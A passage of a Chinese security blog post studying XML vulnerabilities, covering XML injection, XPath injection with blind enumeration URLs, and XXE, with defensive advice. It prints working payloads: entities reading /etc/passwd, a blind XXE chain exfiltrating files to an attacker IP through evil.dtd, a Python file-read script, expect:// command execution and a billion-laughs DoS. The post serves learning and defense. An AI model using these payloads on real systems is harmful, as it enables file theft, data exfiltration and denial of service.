    &lt;!ENTITY copyright SYSTEM &quot;http://www.w3school.com.cn/dtd/entities.dtd&quot;&gt;
]&gt;
&lt;author&gt;&amp;file;©right;&lt;/author&gt;</code></pre><p>外部实体可支持http、file等协议。不同程序支持的协议不同：<br><img src=http://img-blog.csdnimg.cn/20191126231911378.png alt=在这里插入图片描述><br>PHP支持的协议会更多一些，但需要一定的扩展：<br><img src=http://img-blog.csdnimg.cn/20191126232103676.png alt=在这里插入图片描述><br>PHP引用外部实体，<strong>常见的利用协议</strong>：</p><pre><code class=shell>file://文件绝对路径 如：file:///etc/passwd
http://url/file.txt
php://filter/read=convert.base64-encode/resource=xxx.php</code></pre><p><em>参数实体+外部实体</em></p><pre><code class=xml>&lt;!ENTITY % 实体名称 SYSTEM &quot;URI/URL&quot;&gt;</code></pre><p>参数实体+外部实体示例代码：</p><pre><code class=xml>&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
&lt;!DOCTYPE test [
  &lt;!ENTITY % file SYSTEM &quot;file:///etc/passwd&quot;&gt;
  %file;
]&gt;</code></pre><p><code>%file</code>(参数实体)是在DTD中被引用的，而<code>&amp;file;</code>是在xml文档中被引用的。</p><h3 id=0x03-XML注入><a href=#0x03-XML注入 class=headerlink title="0x03 XML注入"></a>0x03 XML注入</h3><p>XML的设计宗旨是传输数据，而非显示数据。<br>XML注入是一种古老的技术，通过利用闭合标签改写XML文件实现的。</p><h4 id=XML注入简介><a href=#XML注入简介 class=headerlink title=XML注入简介></a>XML注入简介</h4><p>XML是一种数据组织存储的数据结构方式，安全的XML在用户输入生成新的数据时候应该只能允许用户接受的数据，需要过滤掉一些可以改变XML标签也就是说改变XML结构插入新功能（例如新的账户信息，等于添加了账户）的特殊输入，如果没有过滤，则可以导致XML注入攻击。</p><h4 id=XML注入前提条件><a href=#XML注入前提条件 class=headerlink title=XML注入前提条件></a>XML注入前提条件</h4><p>（1）用户能够控制数据的输入<br>（2）程序有拼凑的数据</p><p><strong>注入实例</strong><br>test1.xml</p><pre><code class=xml>&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
&lt;manager&gt;
    &lt;admin id=&quot;1&quot;&gt;
    &lt;username&gt;admin&lt;/username&gt;
    &lt;password&gt;admin&lt;/password&gt;

    &lt;/admin&gt;
    &lt;admin id=&quot;2&quot;&gt;
    &lt;username&gt;root&lt;/username&gt;
    &lt;password&gt;root&lt;/password&gt;
    &lt;/admin&gt;
&lt;/manager&gt;</code></pre><p>XML与HTML一样，也存在注入攻击，在注入的方法上也非常相似。<br>对于上面的xml文件，如果攻击者能够掌控password字段，那么就会产生XML注入。如攻击者输入：</p><pre><code class=xml>admin &lt;/password&gt;&lt;/admin&gt;&lt;admin id=&quot;3&quot;&gt;&lt;name&gt;hack&lt;/name&gt;&lt;password&gt;hacker&lt;/password&gt;&lt;/admin&gt;</code></pre><p>最终修改结果为：</p><pre><code class=xml>&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
&lt;manager&gt;
    &lt;admin id=&quot;1&quot;&gt;
    &lt;name&gt;admin&lt;/name&gt;
    &lt;password&gt;admin&lt;/password&gt;
    &lt;/admin&gt;
    &lt;admin id=&quot;2&quot;&gt;
    &lt;username&gt;root&lt;/username&gt;
    &lt;password&gt;root&lt;/password&gt;
    &lt;/admin&gt;
    &lt;admin id=&quot;3&quot;&gt;
    &lt;name&gt;hack&lt;/name&gt;
    &lt;password&gt;hacker&lt;/password&gt;
    &lt;/admin&gt;
&lt;/manager&gt;</code></pre><p>这样就通过XML注入添加了一个名为hack、密码为：hacker的管理员账户。<br>XML注入两大要素：<strong>标签闭合和获取XML表结构</strong></p><h4 id=XML注入防御><a href=#XML注入防御 class=headerlink title=XML注入防御></a>XML注入防御</h4><p>（1）对用户的输入进行过滤<br>（2）对用户的输入进行转义<br>| 预定义字符 | 转以后的预定义字符 |<br>|–|–|<br>|<code>&lt;</code>|<code>&amp;lt;</code>|<br>|<code>&gt;</code>|<code>&amp;gt;</code>|<br>|<code>&amp;</code>|<code>&amp;amp;</code>|<br>|<code>&#39;</code>|<code>&amp;apos;</code>|<br>|<code>&quot;</code>|<code>&amp;quot;</code>|</p><h3 id=0x04-XPath注入><a href=#0x04-XPath注入 class=headerlink title="0x04 XPath注入"></a>0x04 XPath注入</h3><h4 id=XPath注入攻击简介><a href=#XPath注入攻击简介 class=headerlink title=XPath注入攻击简介></a>XPath注入攻击简介</h4><p>XPath注入攻击是指利用XPath 解析器的松散输入和容错特性，能够在 URL、表单或其它信息上附带恶意的XPath 查询代码，以获得权限信息的访问权并更改这些信息。XPath注入攻击是针对Web服务应用新的攻击方法，它允许攻击者在事先不知道XPath查询相关知识的情况下，通过XPath查询得到一个XML文档的完整内容。</p><p>XPath注入发生在当站点使用用户输入的信息来构造请求以获取XML数据。攻击者对站点发送经过特殊构造的信息来探究站点使用的XML是如何构造的，从而进一步获取正常途径下无法获取的数据。当XML数据被用作账户验证时，攻击者还可以提升他的权限。</p><h4 id=XPath注入攻击特点><a href=#XPath注入攻击特点 class=headerlink title=XPath注入攻击特点></a>XPath注入攻击特点</h4><p>XPath注入攻击利用两种技术，即<strong>XPath扫描</strong>和 <strong>XPath查询布尔化</strong>。通过该攻击，攻击者可以控制用来进行XPath查询的XML数据库。这种攻击可以有效地对付使用XPath查询（和XML数据库） 来执行身份验证、查找或者其它操作。</p><p>XPath注入攻击同SQL注入攻击类似，但与SQL注入相比，XPath具有的优势：</p><ol><li><p>广泛性<br>只要是利用XPath语法的Web 应用程序若未对输入的XPath查询做严格的处理都会存在XPath注入漏洞。而在SQL注入攻击过程中根据数据库支持的SQL语言不同，注入攻击的实现可能不同。</p></li><li><p>危害性大<br>XPath语言几乎可以没有访问控制限制的引用XML文档的所有部分。而在SQL注入中，一个“<code>用户</code>”的权限可能被限制到 某一特定的表、列或者查询。<br>XPath注入攻击可以保证得到完整的XML文档，即完整的数据库。只要Web服务应用具有基本的安全漏洞，即可构造针对 XPath应用的自动攻击。</p></li></ol><h4 id=Xpath注入攻击原理与利用><a href=#Xpath注入攻击原理与利用 class=headerlink title=Xpath注入攻击原理与利用></a>Xpath注入攻击原理与利用</h4><p>XPath注入攻击主要是通过构建特殊的输入，这些输入往往是XPath语法中的一些组合，这些输入将作为参数传入Web 应用程序，通过执行XPath查询而执行入侵者想要的操作。<br>注入对象不是数据库users表，而是一个存储数据的XML文件。因为xpath不存在访问控制，所以不会遇到许多在SQL注入中经常遇到的访问限制。 注入出现的位置也就是<code>cookie</code>，<code>headers</code>，<code>request</code> <code>parameters/input</code>等。<br><a href=http://www.cnblogs.com/wendyw/p/11633588.html target=_blank rel=noopener>Xpath基本语法</a><br><a href=http://www.freebuf.com/column/211251.html target=_blank rel=noopener>xPath注入学习之基础语法学习</a></p><p>如果一个网站某应用程序将数据保存在XML中，并且对用户的输入没有做限制，攻击者提交了没有经过处理的输入，就插入到 XPath 查询中，即产生Xpath注入，那么就攻击者就可能通过控制查询，获取数据，或者删除数据之类的操作。</p><p>Xpath是xml路径语言，用于配置文件的查找。数据库就是xml文件。因此只要是利用XPath语法的Web 应用程序如果未对输入的XPath查询做严格的处理都会存在XPath注入漏洞。比如一些登录地址页面，搜索页面需要与xml交互的位置。<br><strong>1、Xpath直接注入</strong><br>示例代码：<br>test2.xml(存储用户名和密码)</p><pre><code class=xml>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;root&gt;
    &lt;users&gt; 
        &lt;user&gt; 
            &lt;id&gt;1&lt;/id&gt;
            &lt;username&gt;test1&lt;/username&gt;
            &lt;password&gt;test1&lt;/password&gt;
        &lt;/user&gt; 
        &lt;user&gt; 
            &lt;id&gt;2&lt;/id&gt;
            &lt;username&gt;test2&lt;/username&gt;
            &lt;password&gt;test2&lt;/password&gt;
        &lt;/user&gt;
    &lt;/users&gt;
&lt;/root&gt;</code></pre><p>2.php(用于接收传入参数，并进行XML查询)</p><pre><code class=php>&lt;?php
$xml=simplexml_load_file(&#39;test2.xml&#39;);
$name=$_GET[&#39;name&#39;];
$pwd=$_GET[&#39;pwd&#39;];
$query=&quot;/root/users/user[username/text()=&#39;&quot;.$name.&quot;&#39; and password/text()=&#39;&quot;.$pwd.&quot;&#39;]&quot;;
echo $query;
$result=$xml-&gt;xpath($query);
if($result){
    echo &#39;&lt;h2&gt;Welcome&lt;/h2&gt;&#39;;
    foreach($result as $key=&gt;$value){
        echo &#39;&lt;br /&gt;ID:&#39;.$value-&gt;id;
        echo &#39;&lt;br /&gt;Username:&#39;.$value-&gt;username;
    }
}
?&gt;</code></pre><p><strong><a href=http://www.w3school.com.cn/php/func_simplexml_load_file.asp target=_blank rel=noopener><code>simplexml_load_file()</code>函数</a></strong><br>返回类 SimpleXMLElement 的一个对象，该对象的属性包含 XML 文档中的数据</p><p>正常查询：<code>/root/users/user[username/text()=&#39;test1&#39;and password/text()=&#39;test1&#39;]</code><br><img src=http://img-blog.csdnimg.cn/20191129230634712.jpg alt=在这里插入图片描述><br>攻击者在<code>username</code>字段中输入：<code>&#39; or 1=1 or &#39;&#39;=&#39;</code><br>变成<code>/root/users/user[username/text()=&#39;&#39; or 1=1 or &#39;&#39;=&#39;&#39; and password/text()=&#39;1&#39;]</code>，成功获取所有user数据。上面这个字符串会在逻辑上使查询一直返回 <code>true</code> 并将一直允许攻击者访问系统。<br><img src=http://img-blog.csdnimg.cn/20191129231005923.jpg alt=在这里插入图片描述><br>攻击者可以利用 XPath 在应用程序中动态地操作 XML 文档。攻击完成登录可以再通过XPath盲注技术获取最高权限帐号和其它重要文档信息。<br><strong>2、XPath盲注</strong><br>如果遍历出整个XML文档，一般步骤如下：<br><em>1.盲注根节点</em><br>利用count（/*）判断根下节点：</p><pre><code class=php>http://127.0.0.1/xml/2.php?name=&#39; or count(/*) = 1 or &#39;1&#39; = &#39;2</code></pre><p><img src=http://img-blog.csdnimg.cn/20191130001342877.jpg alt=在这里插入图片描述><br>有返回结果证明存在一个根节点。<br>利用substring分割根节点的每个字符，猜解第一级节点：</p><pre><code class=php>http://127.0.0.1/xml/2.php?name=&#39; or substring(name(/*[position() = 1]),1,1)=&#39;r&#39; or &#39;1&#39;=&#39;2
http://127.0.0.1/xml/2.php?name=&#39; or substring(name(/*[position() = 1]),2,1)=&#39;o&#39; or &#39;1&#39;=&#39;2</code></pre><p>…<br>最终结果: root<br><em>2.盲注root的下一级节点</em><br>判断root的下一级节点数：</p><pre><code class=php>http://127.0.0.1/xml/2.php?name=&#39; or count(/root/*) = 1 or &#39;1&#39; = &#39;2</code></pre><p>有返回结果证明存在一个root的下一级节点。<br><img src=http://img-blog.csdnimg.cn/20191130001458382.jpg alt=在这里插入图片描述><br>猜解root的下一级节点：</p><pre><code class=php>http://127.0.0.1/xml/2.php?name=&#39; or substring(name(/root/*[position() = 1]),1,1)=&#39;u&#39; or &#39;1&#39;=&#39;2
http://127.0.0.1/xml/2.php?name=&#39; or substring(name(/root/*[position() = 1]),2,1)=&#39;s&#39; or &#39;1&#39;=&#39;2</code></pre><p>最终结果:users<br>重复上述步骤，直至猜解出所有节点，最后来猜解节点中的数据或属性值。</p><h4 id=Xpath注入攻击危害><a href=#Xpath注入攻击危害 class=headerlink title=Xpath注入攻击危害></a>Xpath注入攻击危害</h4><ul><li>在URL及表单中提交恶意XPath代码，可获取到权限限制数据的访问权，并可修改这些数据。</li><li>可通过此类漏洞查询获取到系统内部完整的XML文档内容。</li><li>逻辑以及认证被绕过，它不像数据库那样有各种权限，xml没有各种权限的概念,正因为没有权限概念，因此利用xpath构造查询的时候整个数据库都会被用户读取。</li></ul><h4 id=Xpath注入攻击防御><a href=#Xpath注入攻击防御 class=headerlink title=Xpath注入攻击防御></a>Xpath注入攻击防御</h4><ol><li>数据提交到服务器上端，在服务端正式处理这批数据之前，对提交数据的合法性进行验证。</li><li>检查提交的数据是否包含特殊字符，对特殊字符进行编码转换或替换、删除敏感字符或字符串。</li><li>对于系统出现的错误信息，以IE错误编码信息替换，屏蔽系统本身的出错信息。</li><li>参数化XPath查询，将需要构建的XPath查询表达式，以变量的形式表示，变量不是可以执行的脚本。</li><li>通过MD5、SSL等加密算法，对于数据敏感信息和在数据传输过程中加密，即使某些非法用户通过非法手法获取数据包，看到的也是加密后的信息。 总结下就是：限制提交非法字符，对输入内容严格检查过滤，参数化XPath查询的变量。</li></ol><h3 id=0x05-XML外部实体注入-XXE><a href=#0x05-XML外部实体注入-XXE class=headerlink title="0x05 XML外部实体注入(XXE)"></a>0x05 XML外部实体注入(XXE)</h3><h4 id=XXE漏洞简介><a href=#XXE漏洞简介 class=headerlink title=XXE漏洞简介></a>XXE漏洞简介</h4><p>XXE漏洞全称XML External Entity Injection 即XML外部实体注入。<br>XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件和代码，造成<strong>任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击</strong>等危害。<br>XXE漏洞触发的点往往是可以上传xml文件的位置，没有对上传的xml文件进行过滤，导致可上传恶意xml文件。</p><p>解析xml在php库libxml，libxml&gt;=2.9.0的版本中没有XXE漏洞。<br><a href=https://www.runoob.com/php/func-simplexml-load-string.html target=_blank rel=noopener>simplexml_load_string()</a>可以读取XML</p><h4 id=XXE本地搭建环境测试><a href=#XXE本地搭建环境测试 class=headerlink title=XXE本地搭建环境测试></a>XXE本地搭建环境测试</h4><p>xxe.php</p><pre><code class=php>&lt;?php
$xmlfile=file_get_contents(&#39;php://input&#39;);
$dom=new DOMDocument();
$dom-&gt;loadXML($xmlfile);
$xml=simplexml_import_dom($dom);
$xxe=$xml-&gt;xxe;
$str=&quot;$xxe \n&quot;;
echo $str;
?&gt;</code></pre><ul><li><code>file_get_contents</code>获取客户端输入内容</li><li><code>new DOMDocument()</code>初始化XML解析器</li><li><code>loadXML($xmlfile)</code>加载客户端输入的XML内容</li><li><code>simplexml_import_dom($dom)</code>获取XML文档节点，如果成功则返回SimpleXMLElement对象，如果失败则返回FALSE。</li><li>获取SimpleXMLElement对象中的节点XXE，然后输出XXE内容。</li></ul><pre><code class=xml>&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
&lt;!DOCTYPE a [
&lt;!ENTITY file SYSTEM &quot;file:///d://qwzf.txt&quot;&gt;
]&gt;
&lt;xml&gt;
&lt;xxe&gt;&amp;file;&lt;/xxe&gt;
&lt;/xml&gt;</code></pre><p><img src=http://img-blog.csdnimg.cn/2019113022532720.jpg alt=在这里插入图片描述></p><h4 id=XXE常见利用方式><a href=#XXE常见利用方式 class=headerlink title=XXE常见利用方式></a>XXE常见利用方式</h4><p>与SQL相似，XXE漏洞也分为有回显和无回显<br>有回显，可以直接在页面中看到payload的执行结果或现象。<br>无回显，又称为blind xxe，可以使用外带数据(OOB)通道提取数据。即可以引用远程服务器上的XML文件读取文件。</p><h5 id=1、读取任意文件><a href=#1、读取任意文件 class=headerlink title=1、读取任意文件></a>1、读取任意文件</h5><p>首先准备一个有XXE漏洞的文件，这里以php文件为例<br>示例代码</p><pre><code class=php>&lt;?php
$xml = simplexml_load_string($_REQUEST[&#39;xml&#39;]);
print_r($xml);//注释掉该语句即为无回显的情况
?&gt;</code></pre><p>构造payload</p><pre><code class=xml>&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
&lt;!DOCTYPE xxe [
&lt;!ELEMENT name ANY &gt;
&lt;!ENTITY file SYSTEM &quot;file:///d://qwzf.txt&quot; &gt;
]&gt;
&lt;root&gt;
&lt;name&gt;&amp;file;&lt;/name&gt;
&lt;/root&gt;</code></pre><p><img src=http://img-blog.csdnimg.cn/20191130233405565.jpg alt=在这里插入图片描述><br>读取文件，需URL编码后执行。<br>通过<strong>构造外部实体payload</strong>，在 xml 中 <code>&amp;file ;</code> 变成了外部文件<code>qwzf.txt</code>中内容，导致敏感信息泄露。<br><strong>靶场练习</strong><br>使用一下靶场练习回显读取文件和无回显读取文件：<a href=http://github.com/c0ny1/xxe-lab target=_blank rel=noopener>xxe-lab</a><br><img src=http://img-blog.csdnimg.cn/20191201004910357.jpg alt=在这里插入图片描述><br>输入，抓包发包，发现通过XML传输数据<br><img src=http://img-blog.csdnimg.cn/20191201005338552.jpg alt=在这里插入图片描述><br>php源码</p><pre><code class=php>&lt;?php
$USERNAME = &#39;admin&#39;; //账号
$PASSWORD = &#39;admin&#39;; //密码
$result = null;
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents(&#39;php://input&#39;);

try{
    $dom = new DOMDocument();
    $dom-&gt;loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $username = $creds-&gt;username;
    $password = $creds-&gt;password;
    if($username == $USERNAME &amp;&amp; $password == $PASSWORD){
        $result = sprintf(&quot;&lt;result&gt;&lt;code&gt;%d&lt;/code&gt;&lt;msg&gt;%s&lt;/msg&gt;&lt;/result&gt;&quot;,1,$username);
    }else{
        $result = sprintf(&quot;&lt;result&gt;&lt;code&gt;%d&lt;/code&gt;&lt;msg&gt;%s&lt;/msg&gt;&lt;/result&gt;&quot;,0,$username);
    }    
}catch(Exception $e){
    $result = sprintf(&quot;&lt;result&gt;&lt;code&gt;%d&lt;/code&gt;&lt;msg&gt;%s&lt;/msg&gt;&lt;/result&gt;&quot;,3,$e-&gt;getMessage());
}
header(&#39;Content-Type: text/html; charset=utf-8&#39;);
echo $result;
?&gt;</code></pre><ol><li>有回显</li></ol><p>构造payload</p><pre><code class=xml>&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot; ?&gt;
&lt;!DOCTYPE hack [
&lt;!ENTITY file SYSTEM  &quot;file:///d:/qwzf.txt&quot;&gt;
]&gt;
&lt;user&gt;
  &lt;username&gt;&amp;file;&lt;/username&gt;
  &lt;password&gt;hack&lt;/password&gt;
&lt;/user&gt;</code></pre><p><img src=http://img-blog.csdnimg.cn/20191201010519864.jpg alt=在这里插入图片描述><br>当然，也可以使用<code>php://filter</code>协议读取qwzf.txt文件内容(也可以读取其他类型的文件，如：php文件)</p><pre><code class=php>php://filter/read=convert.base64-encode/resource=</code></pre><ol start=2><li>无回显</li></ol><p>修改源码，禁掉输出代码和报错信息，改成无回显。<br><img src=http://img-blog.csdnimg.cn/20191201011459386.jpg alt=在这里插入图片描述><br>遇到无回显，可以通过<code>Blind XXE</code>方法加上外带数据通道来提取数据，先使用<code>php://filter</code>协议获取目标文件的内容，然后将内容以<code>http</code>请求发送到攻击服务器来读取数据。虽无法直接查看文件内容，但我们可以使用易受攻击的服务器作为代理，在外部网络上执行扫描以及代码。即，当无回显情况时，可以将数据发送到远程服务器(攻击服务器)。</p><p>这里我使用的攻击机ip为：<code>192.168.201.128</code></p><p>构造payload</p><pre><code class=xml>&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE test[
&lt;!ENTITY % file SYSTEM &quot;php://filter/read=convert.base64-encode/resource=D:/qwzf.txt&quot;&gt;
&lt;!ENTITY % dtd SYSTEM &quot;http://192.168.201.128/evil.dtd&quot;&gt;
%dtd;
%send;
]&gt;</code></pre><p>远程服务器部署evil.dtd内容为:</p><pre><code class=xml>&lt;!ENTITY % payload &quot;&lt;!ENTITY % send SYSTEM &#39;http://192.168.201.128/?content=%file;&#39;&gt;&quot;&gt; %payload;</code></pre><p>%要进行实体编码<code>&amp;#x25</code><br>进行XXE攻击后，服务器会把文件内容发送到攻击者服务器(这里是ubantu的apache日志记录)<br><img src=http://img-blog.csdnimg.cn/20191201012728622.jpg alt=在这里插入图片描述><br>ubantu查看apache日志记录命令：</p><pre><code class=shell>tail -f /var/log/apache2/access.log</code></pre><p><em>无回显攻击流程：</em></p><ul><li>先调用<code>%dtd</code>，请求远程服务器(攻击服务器)上的<code>evil.dtd</code>。</li><li>再调用 <code>evil.dtd</code>中的 <code>%file</code>。<code>%file</code> 获取受攻击的服务器上面的敏感文件，然后将 <code>%file</code> 的返回结果传到<code>%send</code> 。</li><li>然后调用 <code>%send;</code> 把读取到的数据发送到远程服务器上。</li></ul><p>这样就实现了外带数据的效果，解决 XXE 无回显的问题。</p><p><strong>使用并分析恶意脚本</strong><br>xxe2.php</p><pre><code class=php>&lt;?php
$data = file_get_contents(&#39;php://input&#39;);
$xml = simplexml_load_string($data);
echo $xml-&gt;name;
?&gt;</code></pre><p>读取文件.py</p><pre><code class=python>#!/usr/bin/python
# -*- coding:utf-8 -*-
import urllib2

if __name__ == &#39;__main__&#39;:

    print u&#39;输入要访问的地址，如http://127.0.0.1/xml/xxe2.php&#39;
    url = raw_input()
    count=1
    while count==1:
        print u&#39;输入要读取的文件，如file:///etc/passwd&#39;
        payload = raw_input()
        headers = {&#39;Content-type&#39;: &#39;text/xml&#39;}
        xml = &#39;&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;&lt;!DOCTYPE xxe [&lt;!ELEMENT name ANY &gt;&lt;!ENTITY xxe SYSTEM &quot;&#39; + payload + &#39;&quot; &gt;]&gt;&lt;root&gt;&lt;name&gt;&amp;xxe;&lt;/name&gt;&lt;/root&gt;&#39;
        req = urllib2.Request(url = url,headers = headers, data = xml)
        res_data = urllib2.urlopen(req)
        res = res_data.read()
        print res</code></pre><p><img src=http://img-blog.csdnimg.cn/20191202134604155.png alt=在这里插入图片描述><br>通过urllib2的request方法用POST方式向目标地址发送XML数据，返回的数据即为服务器相关文件内容。</p><h5 id=2、执行系统命令><a href=#2、执行系统命令 class=headerlink title=2、执行系统命令></a>2、执行系统命令</h5><p>在安装expect扩展的PHP环境里执行系统命令，其他协议也有可能可以执行系统命令。</p><pre><code class=xml>&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
&lt;!DOCTYPE xxe [
&lt;!ELEMENT name ANY &gt;
&lt;!ENTITY xxe SYSTEM &quot;expect://id&quot; &gt;]&gt;
&lt;root&gt;
&lt;name&gt;&amp;xxe;&lt;/name&gt;
&lt;/root&gt;</code></pre><p>通过XXE可以实现RCE的实例很少。</p><h5 id=3、拒绝服务攻击-Dos><a href=#3、拒绝服务攻击-Dos class=headerlink title=3、拒绝服务攻击(Dos)></a>3、拒绝服务攻击(Dos)</h5><pre><code class=xml>&lt;?xml version=&quot;1.0&quot;?&gt;
   &lt;!DOCTYPE lolz [
&lt;!ENTITY lol &quot;lol&quot;&gt;
&lt;!ENTITY lol2 &quot;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&quot;&gt;
&lt;!ENTITY lol3 &quot;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&quot;&gt;
&lt;!ENTITY lol4 &quot;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&quot;&gt;
&lt;!ENTITY lol5 &quot;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&quot;&gt;
&lt;!ENTITY lol6 &quot;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&quot;&gt;
&lt;!ENTITY lol7 &quot;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&quot;&gt;
&lt;!ENTITY lol8 &quot;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&quot;&gt;
&lt;!ENTITY lol9 &quot;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&quot;&gt;
]&gt;
&lt;lolz&gt;&amp;lol9;&lt;/lolz&gt;</code></pre><p><strong>原理</strong>：递归引用,lol 实体具体还有 “lol” 字符串，然后一个 lol2 实体引用了 10 次 lol 实体，一个 lol3 实体引用了 10 次 lol2 实体，此时一个 lol3 实体就含有 10^2 个 “lol” 了，以此类推，lol9 实体含有 10^8 个 “lol” 字符串,最后再引用lol9。</p><h5 id=4、探测内网端口与攻击内网网站><a href=#4、探测内网端口与攻击内网网站 class=headerlink title=4、探测内网端口与攻击内网网站></a>4、探测内网端口与攻击内网网站</h5><p><strong>探测内网端口</strong></p><pre><code class=xml>&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
&lt;!DOCTYPE xxe [
&lt;!ELEMENT name ANY &gt;
&lt;!ENTITY xxe SYSTEM &quot;http://127.0.0.1:80&quot; &gt;]&gt;
&lt;root&gt;
&lt;name&gt;&amp;xxe;&lt;/name&gt;
&lt;/root&gt;</code></pre><p>3306端口开放<br><img src=http://img-blog.csdnimg.cn/20191202142453986.jpg alt=在这里插入图片描述><br>3389端口未开放<br><img src=http://img-blog.csdnimg.cn/2019120214251588.jpg alt=在这里插入图片描述></p><p><strong>攻击内网网站</strong></p><pre><code class=php>&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
&lt;!DOCTYPE xxe [
&lt;!ELEMENT name ANY &gt;
&lt;!ENTITY xxe SYSTEM &quot;http://127.0.0.1:80/payload&quot; &gt;]&gt;
&lt;root&gt;
&lt;name&gt;&amp;xxe;&lt;/name&gt;
&lt;/root&gt;</code></pre><h3 id=0x06-XXE漏洞防御><a href=#0x06-XXE漏洞防御 class=headerlink title="0x06 XXE漏洞防御"></a>0x06 XXE漏洞防御</h3><p><strong>1、使用开发语言提供的禁用外部实体的方法</strong><br>php:</p><pre><code class=php>libxml_disable_entity_loader(true);</code></pre><p>java:</p><pre><code class=java>DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);</code></pre><p>Python:</p><pre><code class=python>from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))</code></pre><p><strong>2、过滤用户提交的XML数据</strong><br>过滤关键字：<code>&lt;\!DOCTYPE</code>和<code>&lt;\!ENTITY</code>，或者<code>SYSTEM</code>和<code>PUBLIC</code>。<br><strong>3、不允许XML中含有自己定义的DTD</strong></p><h3 id=0x07-后记><a href=#0x07-后记 class=headerlink title="0x07 后记"></a>0x07 后记</h3><p>总算把常见XML漏洞学完了，这里重点学习了XXE漏洞(XML外部实体注入)。整体来说，收获很大。</p><p>参考博客：<br><a href=https://www.cnblogs.com/xiaozi/p/5785165.html target=_blank rel=noopener>XML实体注入漏洞</a><br><a href=https://bbs.ichunqiu.com/thread-44650-1-7.html target=_blank rel=noopener>漏洞利用: XML外部实体（XXE）注入</a></p><hr><span style="font-style: italic;color: gray;">转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 qwzf1024@qq.com</span></div></article><p><a class=dashang onclick=dashangToggle()>赏</a></p><div id=vcomment class=comment></div><script src=//cdn1.lncld.net/static/js/3.0.4/av-min.js></script><script src=//unpkg.com/valine/dist/Valine.min.js></script><script src=https://cdnjs.loli.net/ajax/libs/jquery/3.2.1/jquery.min.js></script><script>
    var notify = 'true' == true ? true : false;
    var verify = 'true' == true ? true : false;
    new Valine({
        av: AV,
        el: '#vcomment',
        notify: notify,
        app_id: "5cXOwuHg0Yrf8teE1lzRCjHi-gzGzoHsz",
        app_key: "ToPzd33a36q3VXf83omuntVV",
        placeholder: "快来评论呀！",
        avatar:"mp",
        recordIP: "true",
        enableQQ: "true"
    });
</script></div><div class=copyright><p class=footer-entry><span class=miit><img src=/img/gov.png title=中华人民共和国工业和信息化部> <a href="http://beian.miit.gov.cn/">豫ICP备20008873号</a></span> ©2019-2020 Qwzf</p><p class=footer-entry>Built with <a href="https://hexo.io/" target=_blank>Hexo</a> and <a href=https://github.com/yelog/hexo-theme-3-hexo target=_blank>3-hexo</a> theme</p></div><div class=full-toc><button class=full data-title="切换全屏 快捷键 s"><span class=min></span></button> <a id=rocket></a></div></div><div class=hide_box onclick=dashangToggle()></div><div class=shang_box><a class=shang_close onclick=dashangToggle()>×</a><div class=shang_tit><p>喜欢就点赞,疼爱就打赏</p></div><div class=shang_payimg><div class=pay_img><img src=/img/alipay.jpg class=alipay title=扫码支持> <img src=/img/weixin.jpg class=weixin title=扫码支持></div></div><div class=shang_payselect><span><label><input type=radio name=pay checked value=alipay>支付宝</label></span><span><label><input type=radio name=pay value=weixin>微信</label></span></div></div><script src=/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/haruto.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"log":false});</script></body><script src="/js/jquery.pjax.js?v=1.1.0"></script><script>
  function unmouse(){ 
  document.oncontextmenu = new Function("return false;");
  document.onkeydown = document.onkeyup = document.onkeypress = function(event) {
      var e = event || window.event || arguments.callee.caller.arguments[0];
      if (e && (e.keyCode == 123 || (e.keyCode == 116 && e.type!='keypress'))) 
      {
          e.returnValue = false;
          return (false);
      }
  }
  }
  unmouse()
</script><script src="/js/script.js?v=1.1.0"></script><script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
